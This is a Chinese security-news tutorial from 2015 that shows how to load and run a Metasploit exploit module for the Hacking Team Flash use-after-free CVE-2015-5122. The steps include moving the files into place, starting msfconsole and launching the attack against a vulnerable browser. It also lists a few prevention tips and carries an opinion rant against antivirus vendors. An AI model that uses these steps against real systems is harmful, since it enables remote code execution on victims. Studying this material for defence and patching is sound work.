主站

分类

漏洞 工具 极客 web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据库安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

FreeBuf+小程序

官方公众号企业安全新浪微博

国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区

Metasploit CVE-2015-5122 Flash漏洞利用教程
2015-08-19 19:05:11

前段时间,Hacking Team军火库泄露闹得沸沸扬扬,(点击查看相关报道)各大安全公司也争先恐后地发布了各种的攻击代码分析,但是小编作为一只WEB狗,根本看不懂二进制。有了漏洞分析文章、了解了漏洞细节,但就是不告诉WEB狗狗们如何利用!(心中千万头草泥马啊)

在这篇文章中,我们将在Metasploit中利用CVE-2015-5122(Adobe Flash opaqueBackground Use After Free)Flash 0day 漏洞模块,这一漏洞出现在下载恶意Flash文件时候。最新版本的Adobe Flash播放器(http://www.securityfocus.com/bid/75712)爆出的漏洞出自ActionScript的三个字节数组(ByteArray,),opaqueBackground和BitmapData class。攻击者利用这些漏洞可以在受害者设备上远程执行任意代码。

CVE-2015-5122是Hacking Team泄露的军火库中有关Adobe Flash播放器(18.0.0.203)的第三枚0day,影响Windows、MacOSX和Linux平台上的IE、Chrome浏览器等主流浏览器。
国外发布这篇漏洞利用教程的时候,Adobe已经发布了安全更新。本教程仅供参考。

一.准备工作

首先下载利用代码,并且对利用代码进行重命名为:Adobe_Flash_HackingTeam_exploit.rb

接着在这里下载Payload,把msf.swf移动到:/usr/share/metasploit-framework/data/exploits/CVE-2015-5119/msf.swf
复制exploit到Metasploit 利用模块的文件夹:

mv /root/Desktop/Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/

(因为在/usr/share/metasploit-framework/modules/exploits/windows/中没有flash这一文件夹,操作之前需要先新建flash文件夹 )

用下面的命令来检查文件是否已经复制到目标文件夹:

ls /usr/share/metasploit-framework/modules/exploits/windows/flash/

二.开始
开启一个新的终端并启动Metasploit:

service postgresql start
service metasploit start
msfconsole

现在我们启动了Metasploit并且加载了刚刚新加入的exploit,可以使用命令搜索到它:

search hackingteam

使用新添加的Exploit执行以下命令:

use exploit/windows/flash/Adobe_Flash_HackingTeam_Exploit

接着执行下面的命令检查cve-2015-5122模块需要使用到的选项:

show options

保持默认选项,执行“run”或者“exploit”命令来启动这个exp

exploit

开启一台运行Windows 8.1的虚拟机,使用存在漏洞的浏览器(火狐)并且安装版本为18.0.0.203的Flash播放器, 打开刚刚的链接。

三.演示视频:

四.预防工作:

及时更新Flash播放器;
及时更新系统漏洞补丁,保持系统更新;
安装杀毒软件和防火墙;
及时更新浏览器,使用最新版本;
不安装不需要的插件;

五.题外话
安全来自预防,寄希望于事后杀毒于事无补!

防毒=避孕
杀毒=打胎
免疫=上环结扎
克隆恢复=无痛人流
重装系统=投胎转世

现在的杀毒软件,干的基本上都是打胎的勾当,把病毒放进来(或部分放进来)再杀,从而欺骗普通用户,让用户觉得:这个杀毒软件有用,给我杀掉那么多病毒!我不想与杀毒软件的“专家”们争论所谓的技术问题,只想问大家一句:你购买的杀毒产品给你解决病毒问题了么?!

杀毒产品用户与厂商是一个合同关系,如果厂商不能有效给用户提供安全,老是经常让病毒侵入,反毒技术落后,升级响应不及时,厂商的这种违约行为又给了用户什么补偿?用户负责给厂商付钱,厂商给用户负了什么责?他们的责任尽到位了吗?!如果反病毒引擎过关的话,为什么仍然要依赖所谓的“专杀”?典型病毒需要借助免费的“专杀”处理,那么付费用户与未付费用户又有什么差别?!
我们鄙视的是现在的杀毒产品,而不是否定杀毒技术本身,这是个逻辑问题而不是技术问题,不要拿个例说事。
以防为主的防毒技术是日后反病毒技术的必然归宿。但微点为什么受到打压?广大用户为什么仍然在“享受”众多杀软厂商的愚民宣传?

请牢记:杀毒软件永远只代表软件厂商的利益!
动自己的手,让别人花时间杀毒去吧!
打你的的补丁,让别人花钱买杀软去吧!
免你的疫,让别人杀毒去吧!
避你的孕,让别人打胎去吧!
完善我们的工具箱,让别人束手无策去吧!

*参考来源:hackingtutorialsrapid7 ,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

本文作者:, 转载请注明来自FreeBuf.COM

# flash # Metasploit # 漏洞利用 # Hacking team # CVE-2015-5122
被以下专栏收录,发现更多精彩内容
+ 收入我的专栏
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦